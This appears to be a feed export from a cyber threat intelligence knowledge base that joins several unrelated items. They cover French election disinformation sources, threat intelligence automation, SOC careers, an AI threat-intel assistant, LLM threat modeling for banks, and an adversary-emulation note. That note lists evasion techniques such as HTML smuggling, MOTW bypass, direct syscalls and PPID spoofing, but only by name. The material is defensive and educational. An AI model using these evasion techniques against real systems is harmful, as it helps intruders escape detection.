En resumen, si algo nos enseña #MacronLeaks es que la modernidad tardía ha convertido la información en un teatro de sombras donde la bombilla se enciende y apaga a voluntad del titiritero. La única réplica posible es la vigilancia lúcida: reconocer, con Anders, que nuestras prótesis técnicas superan nuestra estatura moral, y aceptar, con Žižek, que la verdadera resistencia consiste en mantener abierta la pregunta por la realidad misma cuando todo a nuestro alrededor clama que ya no existe tal cosa.Aquí tienes la lista de las fuentes proporcionadas y sus autores, con el formato solicitado: Título: [No se especifica un título principal en los extractos, pero está relacionado con incidentes en infraestructura crítica y evaluación de riesgos.] Autores: Los extractos mencionan a Dr. Rhyner Washburn y Dr. Steve Sin en los agradecimientos por proporcionar datos. La bibliografía cita a varios autores, pero los autores principales del documento no se nombran explícitamente. Resumen del contenido en una frase: El documento parece tratar sobre incidentes significativos en infraestructuras críticas y métodos de evaluación de riesgos para la seguridad. Por quien fue solicitado: No se menciona quién solicitó el documento en los extractos. Título: [El nombre del archivo sugiere "Hacker Attacks on Electronic Election", pero el título completo no está en los extractos.] ** Autores:** Los extractos listan autores en la bibliografía, como Aliaskar et al. o Benabdallah et al., pero los autores principales del documento no se nombran explícitamente. Resumen del contenido en una frase: Basado en la bibliografía, el documento probablemente analiza los ataques informáticos en las elecciones electrónicas y temas relacionados como la identificación de voz y blockchain. Por quien fue solicitado: No se menciona quién solicitó el documento en los extractos. Título: PROCEEDINGS 3RD INDONESIA INTERNATIONAL DEFENSE SCIENCE SEMINAR Autores: Es una publicación de actas con múltiples colaboradores; Jonni Mahroza es el Editor Jefe. Los agradecimientos mencionan a numerosos funcionarios y académicos que contribuyeron con información o supervisión, incluyendo a Col. Oktaheroe Ramsi, Ltc. Ikwan Achmadi, Ingan Malem, Purnomo Yusgiantoro, Lt. Gen. (Ret) Yoedhi Swastanto, Maj. Gen. (Ret) Syaiful Anwar y Aris Arif Mundayat. Varios autores contribuyeron con secciones o trabajos individuales. Resumen del contenido en una frase: Este volumen contiene las actas del 3er Seminario Internacional de Ciencia de la Defensa de Indonesia, presentando investigaciones y análisis sobre diversos aspectos de la defensa y seguridad en Indonesia. Por quien fue solicitado: Organizado por la Indonesia Defense University. Título: [El nombre del archivo sugiere "Cyber Reports 2017-08", pero el título completo no está en los extractos.] Autores: Los extractos listan autores en la bibliografía, como Alperovitch y Andureau, pero los autores principales del informe no se nombran explícitamente. Resumen del contenido en una frase: El informe parece recopilar información o análisis sobre actividades cibernéticas, potencialmente incluyendo interferencia política o trolls en línea, basándose en las fuentes citadas. Por quien fue solicitado: No se menciona quién solicitó el informe en los extractos. Título: Memoire Autores: Gabrielle Desrosiers-Brisebois. Agradece a sus directores de investigación, Professeur Godbout y Professeure Rabbany. Resumen del contenido en una frase: Este es un mémoire (tesis) escrito por Gabrielle Desrosiers-Brisebois, que incluye análisis basados en datos relacionados con la elección federal canadiense de 2021. Por quien fue solicitado: Fue preparado por la autora como tesis académica (implícitamente solicitado por su institución académica y directores de investigación). Título: Notions of disinformation and related concepts (ERGA Report) Autores: Preparado por "expertos de confianza" designados por las Autoridades Nacionales Reguladoras (NRAs); el Presidente del Subgrupo 2 de ERGA es Ľuboš Kukliš. El informe se basa en la experiencia y contribuciones de Ronan Fahy y Natali Helberger y la retroalimentación de varios expertos y partes interesadas, como Claudio Cappon, Mackenzie Nelson, Eleonora Mongelli, Antonio Stango, Nádia Cabral, Sarah Andrew y Nick Flynn. Resumen del contenido en una frase: Este informe de ERGA, presidido por Ľuboš Kukliš, examina las diferentes nociones de desinformación y conceptos relacionados en la investigación actual y su interpretación en los estados miembros de la UE, marcos de derechos fundamentales y estándares de política. Por quien fue solicitado: El Grupo de Reguladores Europeos de Servicios de Medios Audiovisuales (ERGA), específicamente el Subgrupo 2 sobre Pluralidad de Medios – Desinformación. Título: Notions of disinformation and related concepts (ERGA Report) Autores: Preparado por "expertos de confianza" designados por las Autoridades Nacionales Reguladoras (NRAs); el Presidente del Subgrupo 2 de ERGA es Ľuboš Kukliš. El informe incluye contribuciones y retroalimentación de expertos y partes interesadas como Ronan Fahy, Natali Helberger, Antonio Stango, Eleonora Mongelli, Mackenzie Nelson, Nádia Cabral, Sarah Andrew y Nick Flynn. Resumen del contenido en una frase: Este informe de ERGA, presidido por Ľuboš Kukliš, examina las diferentes nociones de desinformación y conceptos relacionados en la investigación actual y su interpretación en los estados miembros de la UE, marcos de derechos fundamentales y estándares de política. Por quien fue solicitado: El Grupo de Reguladores Europeos de Servicios de Medios Audiovisuales (ERGA), específicamente el Subgrupo 2 sobre Pluralidad de Medios – Desinformación. Título: Foreign electoral interference affecting EU democratic processes Autores: Ivana KARÁSKOVÁ, Una Aleksandra BĒRZINA-ČERENKOVA, y Kara NĚMEČKOVÁ. Resumen del contenido en una frase: Este documento, escrito por Karásková, Bērzina-Čerenkova y Němečková, analiza la interferencia electoral extranjera y su impacto en los procesos democráticos dentro de la Unión Europea. Por quien fue solicitado: La Authority for European Political Parties and European Political Foundations. Título: Analysis: Russian Malign Activities in France Since 2022 Autores: Justin Leveque. Resumen del contenido en una frase: Este análisis de Justin Leveque detalla las actividades malignas rusas en Francia desde 2022, incluyendo operaciones de manipulación de información y otras tácticas. Por quien fue solicitado: No se menciona explícitamente quién lo solicitó, pero fue publicado por el ICDS (International Centre for Defence and Security). Título: Foreign interferences and democracy Autores: Edoardo BRESSANELLI (Principal Investigator) y Gaetano INGLESE. Resumen del contenido en una frase: Este estudio de Bressanelli e Inglese examina las interferencias extranjeras y su desafío para la democracia, discutiendo amenazas híbridas y la lucha contra la desinformación. Por quien fue solicitado: El European Parliament's Committee on Constitutional Affairs. Título: The cybersecurity dimension of the war in Ukraine Autores: Según la cita, el autor es Sébastien Barichella. Resumen del contenido en una frase: Este documento, presumiblemente escrito por Sébastien Barichella, aborda la dimensión de la ciberseguridad en el contexto de la guerra en Ucrania. Por quien fue solicitado: No se menciona explícitamente quién lo solicitó, pero fue publicado por el Jacques Delors Institute. Título: [No se especifica un título principal en los extractos. Es un informe de RAND Corporation.] Autores: Los autores principales del informe no se nombran en los extractos, aunque se mencionan "entrevistas con los autores". Resumen del contenido en una frase: Este informe de RAND, basado en entrevistas, parece explorar temas de seguridad o influencia externa en países como Francia, Alemania y Singapur. Por quien fue solicitado: No se menciona quién solicitó el informe en los extractos; es una publicación de RAND Corporation. Título: [No se especifica un título principal en los extractos. Es un informe de RAND Corporation.] Autores: Los autores principales del informe no se nombran en los extractos. Los agradecimientos mencionan contribuciones de varios miembros del personal y expertos, incluyendo a COL Mike Jackson, MAJ Wonny Kim, Eric Damm, James "Mags" Maggelet, Elizabeth Bodine-Baron y Joel Harding. Resumen del contenido en una frase: Este informe de RAND aborda la comprensión y defensa contra esfuerzos de información malignos o subversivos, con un enfoque en las actividades rusas en Europa. Por quien fue solicitado: No se menciona quién solicitó el informe en los extractos; es una publicación de RAND Corporation. Título: The Macron Leaks Operation: A Post-Mortem Analysis Autores: Dr. Jean-Baptiste Jeangène Vilmer. Resumen del contenido en una frase: Este análisis post-mortem de Jean-Baptiste Jeangène Vilmer examina la operación de los Macron Leaks, ofreciendo una evaluación detallada del evento. Por quien fue solicitado: No se menciona quién solicitó este análisis específico, pero el autor participó en un informe más amplio sobre manipulación de información solicitado conjuntamente por el CAPS del Ministerio de Europa y Asuntos Exteriores y el IRSEM del Ministerio de las Fuerzas Armadas. Título: Information Manipulation: A Challenge for Our Democracies Autores: Jean-Baptiste Jeangène Vilmer, Alexandre Escorcia, Marine Guillaume, y Janaina Herrera. Resumen del contenido en una frase: Este informe examina la manipulación de información como un desafío para las democracias y presenta 50 recomendaciones para abordarlo. Por quien fue solicitado: La Policy Planning Staff (CAPS) del Ministry for Europe and Foreign Affairs y el Institute for Strategic Research (IRSEM) del Ministry for the Armed Forces.
tema-cti-articulos-y-casos-de-estudio ]]>projects/cti/caso-elecciones-francesas-2017-desinformacion.htmlProjects/cti/caso-elecciones-francesas-2017-desinformacion.mdTue, 28 Apr 2026 14:35:56 GMT<figure><img src="https://pbs.twimg.com/profile_images/1854330134171471886/59JdETel_normal.jpg"></figure>Threat Intelligence Reports). They are extremely valuable because they accumulate information collected by thousands of experts around the world, reflecting a community-driven perspective in information security. Threat Intelligence can be divided into four primary levels: technical, tactical, operational, and strategic. Instead of diving into worn-out definitions, let's highlight the typical formats in which each level is presented:
Technical — This usually involves network and host indicators of compromise (IoC) such as IP addresses, domains, URLs, email addresses, hashes, and so on. These are presented in both machine-readable and human-readable formats. Tactical — Here, you will find reports or messages in formats like STIX-MISP that detail the tactics, techniques, and procedures (TTPs) deployed by hacker groups and specific malware.
Operational — This level provides reports on indicators of attack (IoA), which cover dynamics such as processes that take place when a threat is being executed. Strategic — Strategic reports shed light on the evolving thought patterns of hackers. They offer insights into trends and the overall direction in which hacker strategies are moving, often covering retrospectives over specific periods. While there has been much discussion on the challenges of working with technical TI, there is a notable silence on the nuances of dealing with the other levels. Actually, this is not surprising considering that in many companies, data at these levels is still predominantly processed manually. It is curious that in the age of self-driving cars and ChatGPT, TI analysts often lean on human intelligence over artificial intelligence for these tasks. Let's delve into why this remains the case.Challenge 1: Information overloadWith the surge in cyberattacks, it is natural that there is also a rise in the analytical materials covering these activities. Several thousand reports are published every year. This breaks down to roughly a dozen reports every day, each averaging around 10 pages. This adds up to an impressive 120 pages of technical content daily.Expecting information security professionals (who are already occupied with the day-to-day tasks of maintaining a company's security) to process this volume of information is unrealistic. There is a clear need for dedicated TI analysts, and given the sheer volume, multiple TI analysts are likely required.Challenge 2: The issue of complete and correct processing of reportsEvery TI report follows a specific process for analysis and implementation: Reviewing the report thoroughly Assessing its relevance to your company's specific security posture/situation Extracting the hacker's techniques, tactics, and procedures highlighted in the report Converting these TTPs into detection rules Deploying these detections within security systems Refining detections based on their performance and results within your company's infrastructure When you consider this rigorous process, it prompts the question: "How many personnel would be needed to effectively manage and implement this workflow?"Challenge 3: Skillset complexity
TI reports, especially at the tactical and operational tiers, carry a unique challenge: they are packed with highly specialized information that demands both breadth and depth of knowledge from the analyst. For instance, one report might delve into the intricate workings of cryptographic mechanisms behind ransomware. Another might focus on the command protocols used in a specific malware, while yet another details the techniques a malicious entity employs to evade sandbox detections or antivirus software.
To truly grasp the contents of these reports and gauge their relevance, a TI analyst needs an extensive skill set. This ranges from understanding cryptography to having insights into operating system architecture. And if a threat actor employs social engineering, the analyst might even need a basic grasp of psychology.While we are not at a point where artificial intelligence can entirely automate the parsing and analysis of reports, there is definitely room to use AI to simplify the life of TI analysts.AI can be used to automate the following operations: TI collection Scouring web resources of TI report providers for new posts Sifting through various messages and articles to single out TI reports An initial automated clean-up of the report, such as removing ads and extraneous content Highlighting relevant info: Highlighting or extracting mentions of malware, hacker groups, hacker tools, and TTPs Identifying any cited legitimate software, services, or APIs
Scanning for YARA, SIGMA rules within the text Extracting network and host indicators of compromise from the report Extracting geodata
Often, a cursory look at the listed objects is insufficient to gauge a report's relevance. In such cases, a concise summary can be invaluable. Highlighting the AI advantages in ITSM and InfoSec, you can use ChatGPT. This tool is adept at crafting abstracts of any size (often 500 words), describing the key points of the TI report using general terms and non-highly technical language.
Furthermore, TI reports often contain valuable attack patterns or malware info in the form of images. A single look at such diagrams can offer an analyst insight into the entire attack sequence (kill chain) without delving into the dense text of the report. One approach here is to utilize a pretrained neural network tailored to classify images from TI reports. For smaller companies with limited resources, partnering with TI vendors that already offer such a service could be a beneficial route.
At all stages of working with TI reports, a wealth of crucial data emerges – IoC, IoA, TTP, sequences in which TTPs are applied, etc. This data is invaluable, both immediately upon receipt (for swift incident response) and over the long term for incident investigations, enriching them with relevant content. Consequently, there is a strong case for building a knowledge base from this data, accessible at any moment.
Storing this vast data as disparate files, notes, or images is not efficient. The optimal approach to housing and navigating Threat Intelligence is through specialized platforms—specifically, Threat Intelligence Platforms equipped with connection graphs. These platforms break down threat reports into a model that vividly maps out the entire context of a threat in terms of interconnected data structures.For instance, given a report on the threat stemming from a specific vulnerability, a Threat Intelligence Platform can depict it as a web of interconnected data: IP Addresses: e.g., "X. X. X. X. "— comprehensive list of addresses trying to connect to exploit the vulnerability. File Hashes: e.g., "dfslidywnsdx.dll " — numerous malicious libraries and files associated with the threat
Vulnerability Records: e.g., "CVE-2023-4477" — detailed description from several aggregators and knowledge bases
TTP from the MITRE ATT&CK matrix: e.g., "System Owner/User Discovery," etc. Hacker Tools: e.g., "Cobalt Strike " — with a detailed description of how to detect it in your infrastructure TI platforms address challenges related to data organization and further augment the rich structure with analytical services. The result is a knowledge base that helps analysts solve the problem of situational awareness. In the event of an incident, they can harness this knowledge base, using its specific data points (like external IP addresses observed during a breach), to pull down, visualize, and comprehend a wealth of essential and highly relevant information.In addition to situational awareness, there is the pressing matter of implementing detections, integrating them into security systems, and adjusting these systems accordingly.
Threat Intelligence Platforms should not merely aggregate and supply vast amounts of TI data. They should be adept at automating the search for indicators amidst a barrage of "raw" events in an optimized manner. Tasking your SIEM with this duty is not pragmatic. Within a single industry, countless indicators may be pertinent to one enterprise, and an already overwhelmed SIEM would simply become overloaded.Some advanced Threat Intelligence Platforms are equipped to carry out auto-detection, both in real time and retrospectively. That is to say, even if a report detailing a threat is assessed today, the platform verifies if such a threat was present yesterday or even a week prior (this duration depends on how long retro-data is retained).
Any discovered indicators are flagged as potential incidents. These incidents then undergo scrutiny. For example, if there are connection attempts from a malicious domain to a server within the "demilitarized zone" (DMZ), this is not particularly alarming. Such activities, often resulting from bots scanning the external perimeter, are commonplace. In such cases, your response might simply involve updating blacklists on the firewall using data from the TIP. However, if detection reveals a connection from your internal infrastructure to a command and control (C&C) domain, the severity of the incident surges dramatically. Such a scenario would necessitate a thorough investigation of the potential connection of the compromised machine to the command center.ConclusionThreat Intelligence has evolved from being just a buzzword to an essential tool for businesses. Nowadays, companies are figuring out how to harness its power without getting overwhelmed by the sheer volume of information. The solution? Embracing automation and artificial intelligence. AI-driven solutions can streamline many important tasks. Modern TIPs are not just databases; they automatically spot attacks using IoA and IoC, sifting through the vast "raw" data from security information systems and company infrastructures. Gathering insights, processing them, storing, and then deploying them to detect threats are the crucial steps in managing Threat Intelligence.
tema-cti-articulos-y-casos-de-estudio ]]>projects/cti/cti-automation-timely-protection.htmlProjects/cti/cti-automation-timely-protection.mdTue, 28 Apr 2026 14:35:56 GMTceh-02-footprinting-recon — footprinting pasivo y activo, OSINT, DNS, WHOIS, Google dorks
Escaneo: ceh-03-network-scanning — Nmap, escaneo de puertos, fingerprinting de servicios, evasión de firewalls
Sniffing: ceh-08-sniffing — captura de tráfico, ARP poisoning, MITM, análisis de protocolos
Explotación: ceh-06-system-hacking-privesc — escalada de privilegios, credential dumping, técnicas de persistencia
Malware: ceh-07-malware-threats — tipos de malware, mecanismos de entrega, evasión de AV
Evasión: ceh-12-evading-ids-firewall — técnicas de evasión de IDS/IPS, fragmentación, tunneling La diferencia clave entre pentesting y adversary emulation es la inteligencia previa. El pentester busca cualquier vulnerabilidad. El adversary emulator replica las TTPs específicas de un actor que es relevante para la organización:
Scattered Spider usó social engineering + helpdesk compromise + ransomware deployment → un ejercicio de emulación replicaría esa cadena exacta
cisa-red-team-assessment-critical-infra documenta un ejercicio real de CISA contra infraestructura crítica: las lecciones aprendidas muestran qué detectó el blue team y qué no Your Pocket Guide to OPSEC in Adversary Emulation es la referencia central: arquitectura ofensiva (C2 con redirectors, múltiples canales), comprensión de las defensas del enemigo (EDR hooks, kernel callbacks, ETW providers), security events críticos (EIDs 3/17/18/4698/4703), y OPSEC tips por fase: Acceso inicial: MOTW bypass, HTML smuggling, VBA purging Kerberos: Overpass The Hash con AES256, Kerberoasting con bajo ruido Movimiento lateral: DCOM, SCShell (fileless sobre DCERPC) Tooling: stageless payloads, direct syscalls, PPID spoofing, entropía controlada
cti-offensive-security-github-tools cataloga herramientas ofensivas de código abierto organizadas por fase del kill chain. Este catálogo se usa tanto para emulación (qué herramientas usa el adversario) como para operaciones red team (qué herramientas usar). El mejor red team es invisible — hasta que elige no serlo. La disciplina OPSEC (C2 architecture, process injection, named pipe pivoting) no es opcional: es lo que separa un test de penetración de una emulación realista de un APT. Si el blue team te detecta por un named pipe con nombre default de Cobalt Strike, no estás emulando a nadie.
tema-cti-articulos-y-casos-de-estudio ]]>projects/cti/adversary-emulation-red-team.htmlProjects/cti/adversary-emulation-red-team.mdTue, 28 Apr 2026 14:35:56 GMTMastering the Art of SOC Analysis for an in-depth guide on developing the rounded set of skills needed for aspiring SOC analysts. In this post, we explore some of the guide’s best tips on how to move from an entry-level SOC analyst to a leader in security operations.Embarking on a career in cybersecurity often begins through an entry-level SOC role, where budding defenders can gradually lay the groundwork for technical skills. Entry-level SOC analysts serve as the frontline defenders, tasked with monitoring security alerts, analyzing potential threats, and responding to incidents. These professionals are immersed in a dynamic environment, gaining hands-on experience with various security tools and technologies.The development of foundational skills in networking architecture, network, log, and endpoint analysis is crucial to success in this early stage. The most important elements include a thorough understanding of: Networking Fundamentals – develop a solid understanding of networking concepts such as TCP/IP, DNS, HTTP, and SSL. Learning to interpret a packet’s structure and each header field’s role can help identify and troubleshoot network issues. Network Security Principles – Focus on firewalls, intrusion detection and prevention systems (IDPS), and virtual private networks (VPNs).
Hands-on Labs Practice – Use virtual labs or physical equipment to gain hands-on experience in configuring and troubleshooting networks. Examples include GNS3, Packet Tracer, EVE-NG, and TryHackMe.
Network Analysis Tools – Various network analysis tools can help analyze network traffic, such as Wireshark, tcpdump, and tshark. These tools can be used to capture, decode, and analyze packets in real-time or from saved capture files.
Network Traffic Analysis – Practice on real-world network traffic data. Sample capture files are obtainable from online resources such as the Wireshark Sample Captures page or by capturing traffic on a test network. Use the traffic to simulate an attack and create detection rules using a NIDS-like snort.
Log Analysis, Parsing, and Search Techniques – SOC analysts must have a wide arsenal of knowledge on log analysis techniques such as anomaly detection, correlation analysis, and threat hunting. Also, practice parsing and searching logs with different log management tools and techniques.
Endpoint Security – Gain as much experience on Endpoint Security tools as possible and learn about advanced threat detection mechanisms like behavioral analysis, machine learning, and artificial intelligence to detect and respond to threats. EDR solutions provide real-time visibility into endpoint devices, enabling SOC analysts to quickly detect and respond to incidents. Beyond understanding network, logging, and endpoint essentials, budding SOC analysts should maintain a proactive mindset and consistently build up their collective knowledge and resources to stay sharp. The following tips and resources can be helpful:
Join Networking and Security Communities – Connect with professionals in the networking and security industry to learn from their experience, ask questions, and gain insights into the latest trends and technologies. Online communities such as Reddit’s /r/networking or /r/netsec, or professional associations such as ISACA, ISSA, or (ISC)², can be a great resource for connecting with others in the field.
Stay Up to Date With Industry News – Follow security and networking news sites such as Dark Reading, BleepingComputer, or SecurityWeek to stay informed on the latest security threats and trends. Add threat intel sites like SentinelLabs to your feeds. Learn from Online Resources – there are many free online resources that can be leveraged to develop cybersecurity skills, including the Wireshark University, PacketTotal, and the SANS Institute. These and other resources can help budding analysts learn advanced techniques like protocol analysis, network forensics, and malware analysis. At this stage, developing SOC analysts are able to comfortably navigate the primary responsibilities of monitoring, analysis, and incident response. As mid-level SOC analysts, the scope broadens, covering a more nuanced understanding of cybersecurity threats and various attack surfaces. A mid-level professional may take the opportunity in their career to dive into specialized areas, honing their expertise in threat detection and incident mitigation, and often taking on leadership responsibilities within smaller teams and some decision-making authority.Adept at interpreting complex security alerts and correlating data from various sources, mid-level analysts contribute to the SOC by having a deeper engagement with threat intelligence feeds. This involves practicing proactive threat hunting and collaborating with cross-functional teams to strengthen their organization’s defenses. At this stage, SOC analysts should have an intricate understanding of cloud computing and security, active directory security, and proactive threat hunting.
Effective SOC analysts continuously work with the industry’s latest technologies and tools. Cloud computing, especially, is of increasing importance as organizations seek to streamline operations, enhance scalability, and stay agile while adapting to market dynamics.
Cloud computing services encompass infrastructure as a service (IaaS), platform as a service (PaaS), and software as a service (SaaS). Essential cloud concepts for SOC analysts include cloud service models, deployment models, security controls, compliance frameworks, and incident response.
Active Directory (AD) has long been a prime target for attackers. To effectively monitor and secure AD, SOC analysts will have a thorough understanding of AD concepts like domains, users, groups, and permissions.
To effectively monitor and manage AD to identify and respond to security incidents, successful SOC analysts will be fluent in AD security best practices – such as implementing strong password policies, restricting administrative access, and regularly auditing AD activity – and familiar with AD security tools, such as Microsoft’s Active Directory Users and Computers (ADUC) console.Threat hunting aims to identify and mitigate advanced threats that can evade traditional security measures. Unlike reactive approaches, threat hunting involves human analysts actively analyzing anomalies and potential security breaches within an organization’s network.Mid-level SOC analysts will leverage a combination of advanced tools, intelligence sources, and their own developing expertise to uncover subtle indicators of compromise and any abnormal patterns that may indicate malicious activities. This process is often iterative and hypothesis-driven, requiring a deep understanding of the organization’s systems and potential threat landscapes.The role of the SOC manager marks a transition from hands-on technical tasks to overseeing the comprehensive security operations of an organization. At this stage, SOC managers shoulder the responsibility of looking at the bigger picture – they are the ones who orchestrate and optimize the greater security infrastructure. This means aligning cybersecurity strategies with the overarching goals of the business.SOC managers are leveraged by senior leadership as cybersecurity subject matter experts (SMEs). They are often brought in as key contributors to a company’s incident response plans (IRPs), incident investigation processes, and expected to lead the implementation of advanced security measures and policies. The role extends beyond technical expertise and can require: The ability to articulate complex cybersecurity concepts to executive leadership by focusing on risk management Managing diverse teams with varying cybersecurity skill sets Constantly adapting security policies and strategies to meet the needs of the business, mitigate emerging threats, and adhere to changing regulatory requirements All of these requirements revolve around being able to communicate well. Building strong communication skills involves practicing clear verbal and written communication as well as developing effective questioning skills.SOC managers possess proficiency in verbal and written communication and are able to communicate effectively with different teams and stakeholders. Top tips for developing the required skills include: Using clear and concise language when communicating with others. Avoiding technical jargon or acronyms that others may not understand. Practicing active listening as part of effective verbal communication. Listening carefully to what others say and asking questions to clarify misunderstandings early on. SOC managers are also responsible for writing reports, creating security policies, and communicating with leadership. Effective reporting uses jargon-free language and overly verbose structures. Short and to-the-point sentences can convey messages quickly and easily, particularly for busy, senior level readers.A critical part of being a clear communicator is asking the right questions to gather useful information and to understand issues quickly. SOC leaders will often be called upon to gather accurate and relevant information, identify patterns and trends, and collaborate in cross-functional projects.Good questioning skills include: Asking open-ended questions – encourage users and other stakeholders to provide detailed information and explanations to fully understand the scope and impact of a security incident. Asking relevant follow-up questions – it is important to obtain additional details and clarification to identify patterns and trends in security incidents. Asking contextual questions – look for the security incident’s bigger picture, including the business impact and related incidents or events. Cybersecurity is a field that is in constant flux and continuous learning is part of the job. SOC analysts can progress in their career by ensuring that they remain adaptable, open to learning, and ready for new challenges. Businesses, similarly, are increasingly aware of the value of skilled security professionals. Together with the right security tools, SOC analysts can keep their businesses safe from evolving threats in the cyber landscape.
tema-cti-articulos-y-casos-de-estudio ]]>projects/cti/cybersecurity-journey-soc-analyst.htmlProjects/cti/cybersecurity-journey-soc-analyst.mdTue, 28 Apr 2026 14:35:56 GMTBlueBravo AI provides comprehensive list of TTPs and associated IoCs Maps TTPs to specific MITRE T-codes Red Team can use information about BlueBravo targeting WMI and PowerShell for threat hunting Search for latest vulnerabilities using natural language prompts AI provides list with embedded CVE links, remediation steps and playbooks Analyst can generate comprehensive executive summary for CISO Report generation reduced from hours to minutes Government entities monitoring cybersecurity threats and providing real-time reporting Example: China's disinformation campaigns analysis Suggested follow-up questions expand inquiry scope Follow-on analysis of Volt Typhoon cyber campaign Recorded Future's AI assistant represents the trend toward natural language interfaces for threat intelligence platforms. The three scenarios demonstrate practical value across different CTI functions: tactical (IoC analysis), operational (vulnerability management), and strategic (geopolitical monitoring). The key differentiator is the integration with Recorded Future's proprietary Intelligence Cloud and Insikt Group research. First-mover advantage: AI Insights launched April 2023, now generative AI assistant Natural language interface reduces barrier to accessing threat intelligence Three validated use cases: IoC analysis, vulnerability assessment, geopolitical monitoring Automation of executive reporting (hours to minutes) Suggested follow-up questions create guided investigation workflows Intelligence Cloud integration provides comprehensive, transparent sourcing
Recorded Future Intelligence Cloud
Insikt Group
BlueBravo Analysis
Recorded Future Cyber Daily Newsletter
tema-cti-articulos-y-casos-de-estudio ]]>projects/cti/recorded-future-ai-evolution.htmlProjects/cti/recorded-future-ai-evolution.mdTue, 28 Apr 2026 14:35:56 GMTtema-cti-articulos-y-casos-de-estudio ]]>projects/cti/cti-theory-vs-experience.htmlProjects/cti/cti-theory-vs-experience.mdTue, 28 Apr 2026 14:35:56 GMTFigure 1:Comparison of Traditional method and LLM-based method. The traditional method (top) requires manual creation of Data Flow Diagrams (DFDs). After threats are identified, additional manual effort is needed to map them to mitigations and code. In contrast, the LLM-based process (bottom) streamlines the workflow by using system descriptions as input to automatically generate threats, corresponding mitigations, and the NIST 800-53 controls.
Threat modeling is a critical cybersecurity process that identifies potential threats and suggests mitigations for system designs using frameworks like Microsoft’s STRIDE [1]. It plays a vital role in proactively addressing vulnerabilities and preventing security breaches, which can lead to significant financial and reputational damages [2]. For instance, threat modeling can block intrusion attempts and prevent hijacking of privileged accounts, significantly reducing risks in critical systems [3]. However, the traditional approach is labor-intensive, requiring manual efforts for Data Flow Diagram (DFD) creation, threat identification, and mapping to mitigations, which makes it inefficient and prone to human error. Figure 1 shows the traditional process relies heavily on tools like the Microsoft Threat Modeling Tool (TMT), which demands extensive manual input at each stage. This is particularly challenging in dynamic sectors like banking, where the rapid evolution of online services and increasing sophistication of threats have intensified the need for more efficient, automated threat modeling solutions [4]. Traditional methods struggle to keep up with the complexity of confidentiality, integrity, and privacy requirements in banking systems, underscoring the urgency for automation.
Large Language Models (LLMs) such as GPT-3 [5] and Llama-3 [6] offer promising potential to transform the threat modeling landscape. Traditional methods, such as pytm [7], do not provide direct mappings to NIST 800-53 standards, which are critical for compliance and comprehensive security analyses. LLMs can process textual descriptions of system designs, automatically identifying threats and suggesting corresponding mitigations. This shift not only accelerates the process but also enhances accuracy by reducing manual intervention. For instance, commonly utilized industry tools like STRIDEGPT [8] and Cyber Sentinel [9] show the trade-offs between automation and precision; STRIDEGPT, while automating threat identification, produces unstable results. Cyber Sentinel, despite its adaptability to new threats, offers limited mitigation strategies. These examples underscore a prevalent trade-off between specializes capabilities and comprehensive functionality across these tools. While pre-trained LLMs, have demonstrated impressive results in various NLP tasks, directly applying them to threat modeling in banking systems is insufficient. Pre-trained LLMs lack domain-specific knowledge and struggle to understand complex banking architectures, resulting in inconsistent threat identification and mitigation suggestions. Moreover, they are not specifically designed to generate mitigation codes aligned with compliance standards like NIST 800-53, which is essential for banking security. These drawbacks highlight that without additional adaptation, LLMs fall short of meeting the precision, compliance, and context-specific needs of threat modeling in the banking sector. However, the adaptation of LLM for threat modeling is non-trivial and poses several challenges:Challenge 1: Lack of publicly available datasets. A significant challenge in threat modeling analysis is the lack of publicly available datasets, especially for complex systems like banking. Traditionally, researchers and security experts generally manually assess potential threats within DFDs, a process that is not only labor-intensive but also prone to human error. To transition towards a data-driven approach for automatically identifying threats in banking system-based DFDs, real-world datasets are essential. These datasets provide crucial information about threats and mitigations in practical scenarios, serving as the foundation for building and training automated tools that can efficiently detect and address security vulnerabilities. However, the creeation of a real-world dataset for automatic threat modeling remains a challenging problem in the field.Challenge 2: Tailored LLMs for banking systems. While LLMs have achieved remarkable success in fields like natural language processing, software security, and network security, applying them to threat analysis in banking systems is an underexplored area. The unique structure and operational complexity of banking systems require specialized threat models that can understand the specific vulnerabilities in financial transactions, user authentication, and data flow between systems. This gap hinders the efficient identification and modeling of threats unique to banking infrastructures. Developing an efficient and effective LLM-based system for bank system-based threat analysis poses an important and creative research question that remains unsolved.Challenge 3: Lacking an automatic mitigation strategies: Once threats are identified, the next critical step is developing effective, real-time mitigation to safeguard the system. However, this is a complex task due to the dynamic and evolving nature of threats within financial systems. Developing novel mitigation strategies requires deep expertise in both banking operations and security protocols, as well as sophisticated algorithms that can adapt to changing threats. Automating this process is particularly challenging because it demands solutions that can respond to threats in real-time while maintaining system efficiency and compliance with stringent banking regulations. Therefore, creating an automatic mitigation strategy remains a challenge that still needs to be addressed to ensure continuous improvement in system security and the protection of sensitive financial data.
To address the first challenge, we created the first benchmark dataset in the community by designing various types of banking systems. For each system, we used the TMT to draw the DFDs based on the application design documents. The TMT-generated threats and human-annotated mitigation strategies using the NIST 800-53 served as the ground truth for fine-tuning the LLMs, ensuring that the dataset accurately reflected real-world security scenarios. For the second and third challenges, we propose combining prompt engineering and fine-tuning methods to create a customized LLM model, ThreatModeling-LLM, specifically for identifying banking system threats and mitigations. Prompt Engineering. We explore different prompt templates to find the optimal structure for the LLM to produce accurate threat and mitigation outputs. Chain-of-Thought (CoT) [10] is used to make the model explicitly reason through intermediate steps, and OPRO (Optimization by PROmpting) [11] is applied to refine the prompts iteratively. These techniques help improve the quality of generated responses when identifying threats and suggesting mitigations.TABLE I:Summary of Related Works in Threat Modeling.
Model Fine-Tuning. Based on the generated prompt, we fine-tune a base LLM (such as Llama-3.1-8B) using our created dataset to empower the LLMs with the abilities to generate more accurate threats and mitigations based on the text input. The fine-tuning process involves Low-Rank Adaptation (LoRA) [23], which allows efficient adaptation of the model to domain-specific tasks like threat identification in banking systems. The fine-tuning data includes DFD descriptions, identified threats, mitigations, and their respective NIST 800-53 control codes. Fine-tuning enables the model to grasp the unique vulnerabilities and mitigations needed in financial systems.Our experiments show that combining prompt engineering and fine-tuning outperforms using the either technique alone. ThreatModeling-LLM demonstrates significant improvements in the accuracy of threat identification and mitigation generation, providing a more effective and automated threat modeling process tailored for the banking sector. Our key contributions are as follows: •  We introduce the innovative ThreatModeling-LLM framework, specifically designed to automate threat modeling for banking systems. This framework is uniquely tailored to address the complexities of the banking domain, combining advanced prompt engineering with fine-tuning techniques to to enhance the capability of pre-trained LLMs. Specifically we optimize the prompt by CoT and OPRO. We then fine-tuning the model with our specialized dataset using the optimized prompt. These techniques encourage the model to explicitly reason through intermediate steps and iteratively refine its responses, leading to more accurate and detailed identification of threats and generation of mitigation strategies aligned with NIST 800-53 control codes. •  To overcome the scarcity of publicly available 